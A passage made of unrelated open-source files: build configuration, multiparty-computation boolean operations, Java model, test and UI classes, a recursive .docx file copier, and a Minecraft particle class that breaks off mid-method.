scalikejdbc/build.sbt
name := """scalikejdbcSample""" version := "1.0" scalaVersion := "2.11.7" libraryDependencies ++= Seq( "org.scalikejdbc" %% "scalikejdbc" % "2.2.7", "mysql" % "mysql-connector-java" % "5.1.36", "org.scalikejdbc" %% "scalikejdbc-jsr310" % "2.2.7", "ch.qos.logback" % "logback-classic" % "1.1.3", "org.scalikejdbc" %% "scalikejdbc-test" % "2.2.7" % "test", "org.scalatest" %% "scalatest" % "2.2.5" % "test" )
sgholamian/log-aware-clone-detection
NLPCCd/Camel/1316_2.java
<gh_stars>0 //,temp,sample_5439.java,2,16,temp,sample_1443.java,2,16 //,3 public class xxx { public void dummy_method(){ assertEquals("Batch responses expected", 8, responseParts.size()); assertNotNull(responseParts.get(0).getBody()); final ODataFeed feed = (ODataFeed) responseParts.get(1).getBody(); assertNotNull(feed); ODataEntry dataEntry = (ODataEntry) responseParts.get(2).getBody(); assertNotNull(dataEntry); dataEntry = (ODataEntry) responseParts.get(3).getBody(); assertNotNull(dataEntry); dataEntry = (ODataEntry) responseParts.get(4).getBody(); assertNotNull(dataEntry); log.info("batch create entry"); } };
lucyq/jiff
lib/client/protocols/booleans/boolean.js
<reponame>lucyq/jiff<filename>lib/client/protocols/booleans/boolean.js // Generic version of operations module.exports = function (SecretShare) { /** * bitwise-XOR with a constant (BOTH BITS). * @method cxor_bit * @param {number} cst - the constant bit to XOR with (0 or 1). * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result. * @memberof module:jiff-client~JIFFClient#SecretShare * @instance */ SecretShare.prototype.cxor_bit = function (cst) { if (!(this.isConstant(cst))) { throw new Error('parameter should be a number (^)'); } if (!this.jiff.share_helpers['binary'](cst)) { throw new Error('parameter should be binary (^)'); } return this.icadd(cst).issub(this.icmult(cst).icmult(2)); }; /** * bitwise-OR with a constant (BOTH BITS). * @method cor_bit * @param {number} cst - the constant bit to OR with (0 or 1). * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result. * @memberof module:jiff-client~JIFFClient#SecretShare * @instance */ SecretShare.prototype.cor_bit = function (cst) { if (!(this.isConstant(cst))) { throw new Error('parameter should be a number (|)'); } if (!this.jiff.share_helpers['binary'](cst)) { throw new Error('parameter should be binary (|)'); } return this.icadd(cst).issub(this.icmult(cst)); }; /** * bitwise-XOR of two secret shares OF BITS. * @method sxor_bit * @param {module:jiff-client~JIFFClient#SecretShare} o - the share to XOR with. * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation. * This id must be unique, and must be passed by all parties to the same instruction, to * ensure that corresponding instructions across different parties are matched correctly. * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result, the final result is 1 if this < o, and 0 otherwise. * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result. * @memberof module:jiff-client~JIFFClient#SecretShare * @instance */ SecretShare.prototype.sxor_bit = function (o, op_id) { if (!(o.jiff === this.jiff)) { throw new Error('shares do not belong to the same instance (^)'); } if (!this.jiff.helpers.Zp_equals(this, o)) { throw new Error('shares must belong to the same field (^)'); } if (!this.jiff.helpers.array_equals(this.holders, o.holders)) { throw new Error('shares must be held by the same parties (^)'); } if (op_id == null) { op_id = this.jiff.counters.gen_op_id('sxor_bit', this.holders); } return this.isadd(o).issub(this.ismult(o, op_id + ':smult1').icmult(2)); }; /** * OR of two secret shares OF BITS. * @method sor_bit * @param {module:jiff-client~JIFFClient#SecretShare} o - the share to OR with. * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation. * This id must be unique, and must be passed by all parties to the same instruction, to * ensure that corresponding instructions across different parties are matched correctly. * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result, the final result is 1 if this < o, and 0 otherwise. * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result. * @memberof module:jiff-client~JIFFClient#SecretShare * @instance */ SecretShare.prototype.sor_bit = function (o, op_id) { if (!(o.jiff === this.jiff)) { throw new Error('shares do not belong to the same instance (|)'); } if (!this.jiff.helpers.Zp_equals(this, o)) { throw new Error('shares must belong to the same field (|)'); } if (!this.jiff.helpers.array_equals(this.holders, o.holders)) { throw new Error('shares must be held by the same parties (|)'); } if (op_id == null) { op_id = this.jiff.counters.gen_op_id('sor_bit', this.holders); } return this.isadd(o).issub(this.ismult(o, op_id + ':smult1')); }; /** * Negation of a bit. * This has to be a share of a BIT in order for this to work properly. * @method not * @return {module:jiff-client~JIFFClient#SecretShare} this party's share of the result (negated bit). * @memberof module:jiff-client~JIFFClient#SecretShare * @instance */ SecretShare.prototype.not = function () { return this.icmult(-1).icadd(1); }; /** * Simulate an oblivious If-else statement with a single return value. * Should be called on a secret share of a bit: 0 representing false, and 1 representing true * If this is a share of 1, a new sharing of the element represented by the first parameter is returned, * otherwise, a new sharing of the second is returned. * @method if_else * @memberof module:jiff-client~JIFFClient#SecretShare * @instance * @param {module:jiff-client~JIFFClient#SecretShare | number} trueVal - the value/share to return if this is a sharing of 1. * @param {module:jiff-client~JIFFClient#SecretShare | number} falseVal - the value/share to return if this is a sharing of 0. * @param {string} [op_id=auto_gen()] - the operation id which is used to identify this operation. * This id must be unique, and must be passed by all parties to the same instruction, to * ensure that corresponding instructions across different parties are matched correctly. * @return {module:jiff-client~JIFFClient#SecretShare} a new sharing of the result of the if. * * @example * // a and b are secret shares * // cmp will be a secret share of either 1 or 0, depending on whether a or b is greater * var cmp = a.gt(b); * * // max is set to the greater value, without revealing the value or the result of the inequality * var max = cmp.if_else(a, b); */ SecretShare.prototype.if_else = function (trueVal, falseVal, op_id) { if (op_id == null) { op_id = this.jiff.counters.gen_op_id('if_else', this.holders); } var const1 = this.isConstant(trueVal); var const2 = this.isConstant(falseVal); if (const1 && const2) { return this.icmult(trueVal).isadd(this.inot().icmult(falseVal)); } else if (const1) { return this.inot().ismult(falseVal.icsub(trueVal), op_id + ':smult').icadd(trueVal); } else if (const2) { return this.ismult(trueVal.icsub(falseVal), op_id + ':smult').icadd(falseVal); } else { return this.ismult(trueVal.issub(falseVal), op_id + ':smult').isadd(falseVal); } }; };
rxmicro/rxmicro
rxmicro-annotation-processor-rest-server/src/test/resources/output/io.rxmicro.examples.validation.server.required/model/$$PrimitiveStringModelModelReader.java
<reponame>rxmicro/rxmicro package io.rxmicro.examples.validation.server.required.model; import io.rxmicro.http.QueryParams; import io.rxmicro.rest.model.HttpModelType; import io.rxmicro.rest.model.PathVariableMapping; import io.rxmicro.rest.server.detail.component.ModelReader; import io.rxmicro.rest.server.detail.model.HttpRequest; /** * Generated by {@code RxMicro Annotation Processor} */ public final class $$PrimitiveStringModelModelReader extends ModelReader<PrimitiveStringModel> { @Override public PrimitiveStringModel read(final PathVariableMapping pathVariableMapping, final HttpRequest request, final boolean readParametersFromBody) { final PrimitiveStringModel model = new PrimitiveStringModel(); final QueryParams params = extractParams(request.getQueryString()); readPrimitivesToModel(pathVariableMapping, request, params, model, readParametersFromBody); return model; } public void readPrimitivesToModel(final PathVariableMapping pathVariableMapping, final HttpRequest request, final QueryParams params, final PrimitiveStringModel model, final boolean readParametersFromBody) { model.requiredNotEmptyString = toString(params.getValue("requiredNotEmptyString"), HttpModelType.PARAMETER, "requiredNotEmptyString"); model.nullableString = toString(params.getValue("nullableString"), HttpModelType.PARAMETER, "nullableString"); model.allowEmptyString = toString(params.getValue("allowEmptyString"), HttpModelType.PARAMETER, "allowEmptyString"); model.nullableAndAllowEmptyString = toString(params.getValue("nullableAndAllowEmptyString"), HttpModelType.PARAMETER, "nullableAndAllowEmptyString"); } }
murilloSantana/zip-code-search
domain/src/main/java/com/zipcode/zipcodesearch/usecase/address/chain/ValidZipCodeHandler.java
<filename>domain/src/main/java/com/zipcode/zipcodesearch/usecase/address/chain/ValidZipCodeHandler.java package com.zipcode.zipcodesearch.usecase.address.chain; import com.zipcode.zipcodesearch.entity.Address; import com.zipcode.zipcodesearch.usecase.address.dataprovider.adapter.AddressDataProvider; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.util.Optional; public class ValidZipCodeHandler implements AddressSearchChain { private static final Logger log = LoggerFactory.getLogger(ValidZipCodeHandler.class); private AddressSearchChain addressSearchChain; private final AddressDataProvider addressDataProvider; public ValidZipCodeHandler(AddressDataProvider addressDataProvider) { this.addressDataProvider = addressDataProvider; } @Override public void setNextHandler(AddressSearchChain nextHandler) { this.addressSearchChain = nextHandler; } @Override public Optional<Address> check(String zipCode) { int cepSize = 8; StringBuilder builder = new StringBuilder(zipCode); Optional<Address> address = this.findRecursiveZipCode(builder, cepSize - 1); return address.or(() -> Optional .ofNullable(this.addressSearchChain) .map((addressSearchChain) -> addressSearchChain.check(zipCode)) .orElse(Optional.empty()) ); } public Optional<Address> findRecursiveZipCode(StringBuilder zipCodeBuilder, int positionToReplace) { String zipCode = zipCodeBuilder.toString(); Optional<Address> address = addressDataProvider.findByZipCode(zipCode); if(positionToReplace > -1 && !address.isPresent()) { log.info("Valid Address Not Found: ZIP_CODE {}", zipCode); zipCodeBuilder.setCharAt(positionToReplace, '0'); return findRecursiveZipCode(zipCodeBuilder, --positionToReplace); } return address; } }
charwliu/msf4j
analytics/msf4j-analytics-common/src/main/java/org/wso2/msf4j/analytics/common/tracing/TraceEvent.java
<reponame>charwliu/msf4j /* * Copyright (c) 2016, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.msf4j.analytics.common.tracing; /** * Class to hold tracing start event data. */ public class TraceEvent { private final String type; private final String traceId; private final String originId; private final long time; private int statusCode; private String httpMethod; private String instanceId; private String instanceName; private String parentId; private String url; public TraceEvent(String type, String traceId, String originId, long time) { this.type = type; this.traceId = traceId; this.originId = originId; this.time = time; } public String getType() { return type; } public String getTraceId() { return traceId; } public String getOriginId() { return originId; } public long getTime() { return time; } public String getInstanceId() { return instanceId; } public void setInstanceId(String instanceId) { this.instanceId = instanceId; } public String getInstanceName() { return instanceName; } public void setInstanceName(String instanceName) { this.instanceName = instanceName; } public String getParentId() { return parentId; } public void setParentId(String parentId) { this.parentId = parentId; } public int getStatusCode() { return statusCode; } public void setStatusCode(int statusCode) { this.statusCode = statusCode; } public String getHttpMethod() { return httpMethod; } public void setHttpMethod(String httpMethod) { this.httpMethod = httpMethod; } public String getUrl() { return url; } public void setUrl(String url) { this.url = url; } @Override public String toString() { return "TraceEvent{" + "type='" + type + '\'' + ", traceId='" + traceId + '\'' + ", originId='" + originId + '\'' + ", time=" + time + ", statusCode=" + statusCode + ", httpMethod='" + httpMethod + '\'' + ", instanceId='" + instanceId + '\'' + ", instanceName='" + instanceName + '\'' + ", parentId='" + parentId + '\'' + ", url='" + url + '\'' + '}'; } }
guardian/dotcom-rendering
dotcom-rendering/cypress/lib/privacySettingsIframe.js
<gh_stars>100-1000 export const privacySettingsIframe = () => { return cy .get('[src*="https://cdn.privacy-mgmt.com/privacy-manager"]') .its('0.contentDocument.body') .should('not.be.empty') .then(cy.wrap); };
liuyukuai/commons
commons-core/src/main/java/com/itxiaoer/commons/core/util/UUIDUtils.java
package com.itxiaoer.commons.core.util; import com.itxiaoer.commons.core.date.LocalDateTimeUtil; import java.time.LocalDateTime; import java.util.UUID; /** * @author : liuyk */ @SuppressWarnings("unused") public class UUIDUtils { public static String guid() { return LocalDateTimeUtil.format(LocalDateTime.now(), "yyyyMMddHHmmssSSSSSS") + UUID.randomUUID().toString().replace("-", "").substring(0, 20); } }
leginee/netbeans
dlight/dlight.remote.impl/test/unit/src/org/netbeans/modules/remote/impl/fs/ListenersParityTestCase.java
/* * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER. * * Copyright 2010 Oracle and/or its affiliates. All rights reserved. * * Oracle and Java are registered trademarks of Oracle and/or its affiliates. * Other names may be trademarks of their respective owners. * * The contents of this file are subject to the terms of either the GNU * General Public License Version 2 only ("GPL") or the Common * Development and Distribution License("CDDL") (collectively, the * "License"). You may not use this file except in compliance with the * License. You can obtain a copy of the License at * http://www.netbeans.org/cddl-gplv2.html * or nbbuild/licenses/CDDL-GPL-2-CP. See the License for the * specific language governing permissions and limitations under the * License. When distributing the software, include this License Header * Notice in each file and include the License file at * nbbuild/licenses/CDDL-GPL-2-CP. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the GPL Version 2 section of the License file that * accompanied this code. If applicable, add the following below the * License Header, with the fields enclosed by brackets [] replaced by * your own identifying information: * "Portions Copyrighted [year] [name of copyright owner]" * * If you wish your version of this file to be governed by only the CDDL * or only the GPL Version 2, indicate your decision by adding * "[Contributor] elects to include this software in this distribution * under the [CDDL or GPL Version 2] license." If you do not indicate a * single choice of license, a recipient has the option to distribute * your version of this file under either the CDDL, the GPL Version 2 or * to extend the choice of license to its licensees as provided above. * However, if you add GPL Version 2 code and therefore, elected the GPL * Version 2 license, then the option applies only if the new code is * made subject to such option by the copyright holder. * * Contributor(s): * * Portions Copyrighted 2008 Sun Microsystems, Inc. */ package org.netbeans.modules.remote.impl.fs; import java.io.File; import java.io.IOException; import java.io.PrintStream; import junit.framework.Test; import org.netbeans.modules.nativeexecution.api.ExecutionEnvironment; import org.netbeans.modules.nativeexecution.api.util.ProcessUtils; import org.netbeans.modules.nativeexecution.test.ForAllEnvironments; import org.netbeans.modules.nativeexecution.test.RcFile.FormatException; import org.netbeans.modules.remote.spi.FileSystemProvider; import org.netbeans.modules.remote.test.RemoteApiTest; import org.openide.filesystems.FileLock; import org.openide.filesystems.FileObject; import org.openide.filesystems.FileUtil; /** * There hardly is a way to unit test remote operations. * This is just an entry point for manual validation. * */ public class ListenersParityTestCase extends RemoteFileTestBase { public ListenersParityTestCase(String testName) { super(testName); } public ListenersParityTestCase(String testName, ExecutionEnvironment execEnv) throws IOException, FormatException { super(testName, execEnv); } private void doTestListenersRename2(FileObject baseDirFO, File log, boolean recursive) throws Exception { PrintStream out = new PrintStream(log); try { String prefix = baseDirFO.getPath(); DumpingFileChangeListener fcl = new DumpingFileChangeListener("baseDir", prefix, out, true); if (recursive) { FileSystemProvider.addRecursiveListener(fcl, baseDirFO.getFileSystem(), baseDirFO.getPath()); } else { baseDirFO.addFileChangeListener(fcl); } FileObject childFO = baseDirFO.createData("child_file_1"); FileObject subdirFO = baseDirFO.createFolder("child_folder"); if (!recursive) { subdirFO.addFileChangeListener(new DumpingFileChangeListener(subdirFO.getNameExt(), prefix, out, true)); } FileObject grandChildFO = subdirFO.createData("grand_child_file"); FileObject grandChildDirFO = subdirFO.createFolder("grand_child_dir"); FileObject grandGrandChildFO = grandChildDirFO.createData("grand_grand_child_file"); baseDirFO.refresh(); FileLock lock = grandGrandChildFO.lock(); try { grandGrandChildFO.rename(lock, "grand_grand_child_file_renamed", "txt"); } finally { lock.releaseLock(); } lock = subdirFO.lock(); try { subdirFO.rename(lock, "child_folder_renamed", "dir"); } finally { lock.releaseLock(); } // baseDirFO.refresh() will break the test. TODO: investigate. baseDirFO.refresh(); } finally { out.close(); } } private void doTestListenersDelete2(FileObject baseDirFO, File log, boolean recursive) throws Exception { PrintStream out = new PrintStream(log); try { String prefix = baseDirFO.getPath(); DumpingFileChangeListener fcl = new DumpingFileChangeListener("baseDir", prefix, out, true); if (recursive) { FileSystemProvider.addRecursiveListener(fcl, baseDirFO.getFileSystem(), baseDirFO.getPath()); } else { baseDirFO.addFileChangeListener(fcl); } FileObject childFO = baseDirFO.createData("child_file_1"); FileObject subdirFO = baseDirFO.createFolder("child_folder"); if (!recursive) { subdirFO.addFileChangeListener(new DumpingFileChangeListener(subdirFO.getNameExt(), prefix, out, true)); } FileObject grandChildFO = subdirFO.createData("grand_child_file"); FileObject grandChildDirFO = subdirFO.createFolder("grand_child_dir"); FileObject grandGrandChildFO = grandChildDirFO.createData("grand_grand_child_file"); baseDirFO.refresh(); grandGrandChildFO.delete(); grandChildDirFO.delete(); } finally { out.close(); } } private void doTestListenersRename1(boolean recursive) throws Throwable { File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true); String remoteBaseDir = null; try { remoteBaseDir = mkTempAndRefreshParent(true); FileObject remoteBaseDirFO = getFileObject(remoteBaseDir); FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir)); File workDir = getWorkDir(); File remoteLog = new File(workDir, "remote.dat"); File localLog = new File(workDir, "local.dat"); doTestListenersRename2(remoteBaseDirFO, remoteLog, recursive); doTestListenersRename2(localBaseDirFO, localLog, recursive); if (RemoteApiTest.TRACE_LISTENERS) { printFile(localLog, "LOCAL ", System.out); printFile(remoteLog, "REMOTE", System.out); } File diff = new File(workDir, "diff.diff"); try { assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff); } catch (Throwable ex) { if (diff.exists()) { printFile(diff, null, System.err); } throw ex; } } finally { removeRemoteDirIfNotNull(remoteBaseDir); if (localTmpDir != null && localTmpDir.exists()) { removeDirectory(localTmpDir); } } } private void doTestListenersDelete1(boolean recursive) throws Throwable { File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true); String remoteBaseDir = null; try { remoteBaseDir = mkTempAndRefreshParent(true); FileObject remoteBaseDirFO = getFileObject(remoteBaseDir); FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir)); File workDir = getWorkDir(); File remoteLog = new File(workDir, "remote.dat"); File localLog = new File(workDir, "local.dat"); doTestListenersDelete2(remoteBaseDirFO, remoteLog, recursive); doTestListenersDelete2(localBaseDirFO, localLog, recursive); if (RemoteApiTest.TRACE_LISTENERS) { printFile(localLog, "LOCAL ", System.out); printFile(remoteLog, "REMOTE", System.out); } File diff = new File(workDir, "diff.diff"); try { assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff); } catch (Throwable ex) { if (diff.exists()) { printFile(diff, null, System.err); } throw ex; } } finally { removeRemoteDirIfNotNull(remoteBaseDir); if (localTmpDir != null && localTmpDir.exists()) { removeDirectory(localTmpDir); } } } private void doTestListenersChange1(boolean externalChange) throws Throwable { File localTmpDir = createTempFile(getClass().getSimpleName(), ".tmp", true); String remoteBaseDir = null; try { remoteBaseDir = mkTempAndRefreshParent(true); FileObject remoteBaseDirFO = getFileObject(remoteBaseDir); FileObject localBaseDirFO = FileUtil.toFileObject(FileUtil.normalizeFile(localTmpDir)); File workDir = getWorkDir(); File remoteLog = new File(workDir, "remote.dat"); File localLog = new File(workDir, "local.dat"); doTestListenersChange2(remoteBaseDirFO, remoteLog, externalChange); // for an external change I wasn't able to make masterfs to fire file change event; // but if external change to remote fs behaves the same way internal change for local fs does - then we are fine. doTestListenersChange2(localBaseDirFO, localLog, false); if (RemoteApiTest.TRACE_LISTENERS) { printFile(localLog, "LOCAL ", System.out); printFile(remoteLog, "REMOTE", System.out); } File diff = new File(workDir, "diff.diff"); try { assertFile("Remote and local events differ, see diff " + remoteLog.getAbsolutePath() + " " + localLog.getAbsolutePath(), remoteLog, localLog, diff); } catch (Throwable ex) { if (diff.exists()) { printFile(diff, null, System.err); } throw ex; } } finally { removeRemoteDirIfNotNull(remoteBaseDir); if (localTmpDir != null && localTmpDir.exists()) { removeDirectory(localTmpDir); } } } private void doTestListenersChange2(FileObject baseDirFO, File log, boolean externalChange) throws Exception { PrintStream out = new PrintStream(log); try { String prefix = baseDirFO.getPath(); FileObject subdirFO = baseDirFO.createFolder("child_folder"); FileObject childFO = subdirFO.createData("child_file_1"); subdirFO.addFileChangeListener(new DumpingFileChangeListener("Dir listener", prefix, out, true)); childFO.addFileChangeListener(new DumpingFileChangeListener("File listener", prefix, out, true)); if (externalChange) { ExecutionEnvironment env = FileSystemProvider.getExecutionEnvironment(childFO); ProcessUtils.ExitStatus rc = ProcessUtils.execute(env, "/bin/sh", "-c", "echo new_content > " + childFO.getPath()); assertTrue("external modification command failed", rc.exitCode == 0); if (env.isLocal()) { //FileUtil.refreshAll(); File[] files = new File[] {FileUtil.toFile(subdirFO), FileUtil.toFile(childFO) }; FileUtil.refreshFor(files); sleep(5000); } subdirFO.refresh(); } else { writeFile(childFO, "new file content\n"); } } finally { out.close(); } } @ForAllEnvironments public void testListenersInternalChange() throws Throwable { doTestListenersChange1(false); } @ForAllEnvironments public void testListenersExternalChange() throws Throwable { doTestListenersChange1(true); } @ForAllEnvironments public void testListenersRename() throws Throwable { doTestListenersRename1(false); } @ForAllEnvironments public void testRecursiveListenersRename() throws Throwable { doTestListenersRename1(true); } @ForAllEnvironments public void testListenersDelete() throws Throwable { doTestListenersDelete1(false); } @ForAllEnvironments public void testRecursiveListenersDelete() throws Throwable { doTestListenersDelete1(true); } public static Test suite() { return RemoteApiTest.createSuite(ListenersParityTestCase.class); } }
HoussemNasri/Logisim-Dark
src/logisim_src/gui/opts/ToolbarList.java
<gh_stars>1-10 /* Copyright (c) 2010, <NAME>. License information is located in the * logisim_src.Main source code and at www.cburch.com/logisim/. */ package logisim_src.gui.opts; import java.awt.Component; import java.awt.Graphics; import java.beans.PropertyChangeEvent; import java.beans.PropertyChangeListener; import javax.swing.AbstractListModel; import javax.swing.DefaultListCellRenderer; import javax.swing.Icon; import javax.swing.JLabel; import javax.swing.JList; import javax.swing.ListSelectionModel; import logisim_src.comp.ComponentDrawContext; import logisim_src.data.AttributeEvent; import logisim_src.data.AttributeListener; import logisim_src.file.ToolbarData; import logisim_src.file.ToolbarData.ToolbarListener; import logisim_src.prefs.AppPreferences; import logisim_src.tools.Tool; class ToolbarList extends JList { private static class ToolIcon implements Icon { private Tool tool; ToolIcon(Tool tool) { this.tool = tool; } public void paintIcon(Component comp, Graphics g, int x, int y) { Graphics gNew = g.create(); tool.paintIcon(new ComponentDrawContext(comp, null, null, g, gNew), x + 2, y + 2); gNew.dispose(); } public int getIconWidth() { return 20; } public int getIconHeight() { return 20; } } private static class ListRenderer extends DefaultListCellRenderer { @Override public Component getListCellRendererComponent(JList list, Object value, int index, boolean isSelected, boolean cellHasFocus) { Component ret; Icon icon; if (value instanceof Tool) { Tool t = (Tool) value; ret = super.getListCellRendererComponent(list, t.getDisplayName(), index, isSelected, cellHasFocus); icon = new ToolIcon(t); } else if (value == null) { ret = super.getListCellRendererComponent(list, "---", index, isSelected, cellHasFocus); icon = null; } else { ret = super.getListCellRendererComponent(list, value.toString(), index, isSelected, cellHasFocus); icon = null; } if (ret instanceof JLabel) { ((JLabel) ret).setIcon(icon); } return ret; } } private class Model extends AbstractListModel implements ToolbarListener, AttributeListener, PropertyChangeListener { public int getSize() { return base.size(); } public Object getElementAt(int index) { return base.get(index); } public void toolbarChanged() { fireContentsChanged(this, 0, getSize()); } public void attributeListChanged(AttributeEvent e) { } public void attributeValueChanged(AttributeEvent e) { repaint(); } public void propertyChange(PropertyChangeEvent event) { if (AppPreferences.GATE_SHAPE.isSource(event)) { repaint(); } } } private ToolbarData base; private Model model; public ToolbarList(ToolbarData base) { this.base = base; this.model = new Model(); setModel(model); setCellRenderer(new ListRenderer()); setSelectionMode(ListSelectionModel.SINGLE_SELECTION); AppPreferences.GATE_SHAPE.addPropertyChangeListener(model); base.addToolbarListener(model); base.addToolAttributeListener(model); } public void localeChanged() { model.toolbarChanged(); } }
CembZy/java-bable
concurrent-plus/src/com/concurrent/ch02/forkjoin/recursiveaction/FindFilesAndCopy.java
<filename>concurrent-plus/src/com/concurrent/ch02/forkjoin/recursiveaction/FindFilesAndCopy.java package io.renren.modules; import java.io.*; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.concurrent.ForkJoinPool; import java.util.concurrent.RecursiveAction; /** * 使用无返回值的ForkJoin,同时是异步的,遍历目录,搜寻目录下的所有符合条件的文件病复制到指定目录 */ public class FindFilesAndCopy extends RecursiveAction { //要搜寻的目录 private File dir; public FindFilesAndCopy(File dir) { this.dir = dir; } @Override protected void compute() { File[] files = dir.listFiles(); if (files != null) { List<FindFilesAndCopy> list = new ArrayList<>(); for (File file : files) { //如果是目录,就需要分割任务,交给ForkJoinPool去执行,因为任务数目不确定,所以需要定义一个集合 if (file.isDirectory()) { FindFilesAndCopy findFiles = new FindFilesAndCopy(file); list.add(findFiles); //不是目录,是文件就执行自己的逻辑 } else { if (file.getAbsolutePath().endsWith(".docx")) { System.out.println(file.getAbsolutePath()); try { copyFile(file.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); } } } } //如果任务 if (list.size() > 0) { Collection<FindFilesAndCopy> findFiles = invokeAll(list); for (FindFilesAndCopy findFiles1 : findFiles) { //等待所有的任务执行完成 findFiles1.join(); //所有的任务都执行完了才会执行 System.out.println(Thread.currentThread().getName() + "....join end.."); } } } } /** * 复制文件到指定目录 * * @param sourcePath * @throws IOException */ public static void copyFile(String sourcePath) throws IOException { File src = new File(sourcePath); String targetPath = "C:\\Users\\86199\\Desktop\\clean\\" + src.getName(); File dest = new File(targetPath); // 判断拼接成的路径是否存在 if (!dest.exists()) { dest.createNewFile(); } // 开始复制文件 FileInputStream fis = new FileInputStream(src); FileOutputStream fos = new FileOutputStream(dest); byte[] b = new byte[1024]; int len; while ((len = fis.read(b)) != -1) { fos.write(b, 0, len); } fos.close(); fis.close(); } private static void testFork() { ForkJoinPool forkJoinPool = new ForkJoinPool(); FindFilesAndCopy findFiles = new FindFilesAndCopy(new File("D:\\clean\\xiangxue\\VIP")); //execute方法是异步的 forkJoinPool.execute(findFiles); //阻塞,等待ForkJoin执行完,主线程才往下执行 findFiles.join(); System.out.println("end....."); } public static void main(String[] args) { testFork(); } }
halotroop2288/consulo
modules/desktop-awt/desktop-ui-laf-impl/src/main/java/consulo/desktop/ui/laf/idea/darcula/DarculaPopupMenuBorder.java
// Copyright 2000-2019 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package consulo.desktop.ui.laf.idea.darcula; import com.intellij.ide.ui.laf.intellij.IdeaPopupMenuUI; import com.intellij.ui.Gray; import com.intellij.ui.JBColor; import com.intellij.util.ui.JBInsets; import com.intellij.util.ui.JBUI; import javax.swing.border.AbstractBorder; import javax.swing.plaf.UIResource; import javax.swing.plaf.basic.BasicComboPopup; import java.awt.*; import java.awt.geom.Path2D; /** * @author <NAME> */ public class DarculaPopupMenuBorder extends AbstractBorder implements UIResource { private static final JBInsets DEFAULT_INSETS = JBUI.insets(1); @Override public void paintBorder(Component c, Graphics g, int x, int y, int width, int height) { if (IdeaPopupMenuUI.isUnderPopup(c)) { return; } Graphics2D g2 = (Graphics2D)g.create(); try { g2.setColor(JBColor.namedColor("Menu.borderColor", new JBColor(Gray.xCD, Gray.x51))); g2.fill(getBorderShape(c, new Rectangle(x, y, width, height))); } finally { g2.dispose(); } } private static Shape getBorderShape(Component c, Rectangle rect) { Path2D border = new Path2D.Float(Path2D.WIND_EVEN_ODD); if (isComboPopup(c) && ((BasicComboPopup)c).getClientProperty("JComboBox.isCellEditor") == Boolean.TRUE) { JBInsets.removeFrom(rect, JBInsets.create(0, 1)); } border.append(rect, false); Rectangle innerRect = new Rectangle(rect); JBInsets.removeFrom(innerRect, JBUI.insets(JBUI.getInt("PopupMenu.borderWidth", 1))); border.append(innerRect, false); return border; } @Override public Insets getBorderInsets(Component c) { if (isComboPopup(c)) { return JBInsets.create(1, 2).asUIResource(); } if (IdeaPopupMenuUI.isUnderPopup(c)) { return JBUI.insets("PopupMenu.borderInsets", DEFAULT_INSETS).asUIResource(); } return DEFAULT_INSETS.asUIResource(); } protected static boolean isComboPopup(Component c) { return "ComboPopup.popup".equals(c.getName()) && c instanceof BasicComboPopup; } }
p455w0rd/EndermanEvolution
src/main/java/p455w0rd/endermanevo/client/particle/ParticleEvolvedEndermanAggroPortal.java
<filename>src/main/java/p455w0rd/endermanevo/client/particle/ParticleEvolvedEndermanAggroPortal.java package p455w0rd.endermanevo.client.particle; import net.minecraft.client.particle.IParticleFactory; import net.minecraft.client.particle.Particle; import net.minecraft.client.renderer.*; import net.minecraft.entity.Entity; import net.minecraft.world.World; import net.minecraftforge.fml.relauncher.Side; import net.minecraftforge.fml.relauncher.SideOnly; /** * @author p455w0rd * */ public class ParticleEvolvedEndermanAggroPortal extends Particle { private final float portalParticleScale; private final double portalPosX; private final double portalPosY; private final double portalPosZ; public ParticleEvolvedEndermanAggroPortal(World worldIn, double xCoordIn, double yCoordIn, double zCoordIn, double xSpeedIn, double ySpeedIn, double zSpeedIn) { super(worldIn, xCoordIn, yCoordIn, zCoordIn, xSpeedIn, ySpeedIn, zSpeedIn); motionX = xSpeedIn; motionY = ySpeedIn; motionZ = zSpeedIn; posX = xCoordIn; posY = yCoordIn; posZ = zCoordIn; portalPosX = posX; portalPosY = posY; portalPosZ = posZ; float f = rand.nextFloat() * 0.6F + 0.4F; particleScale = rand.nextFloat() * 0.2F + 0.5F; portalParticleScale = particleScale; particleRed = f * 1.0F; particleGreen = f * 0.1F; particleBlue = f * 0.2F; particleMaxAge = (int) (Math.random() * 10.0D) + 40; setParticleTextureIndex((int) (Math.random() * 8.0D)); } @Override public void move(double x, double y, double z) { setBoundingBox(getBoundingBox().offset(x, y, z)); resetPositionToBB(); } /** * Renders the particle */ @Override public void renderParticle(BufferBuilder worldRendererIn, Entity entityIn, float partialTicks, float rotationX, float rotationZ, float rotationYZ, float rotationXY, float rotationXZ) { float f = (particleAge + partialTicks) / particleMaxAge; f = 1.0F - f; f = f * f; f = 1.0F - f; particleScale = portalParticleScale * f; 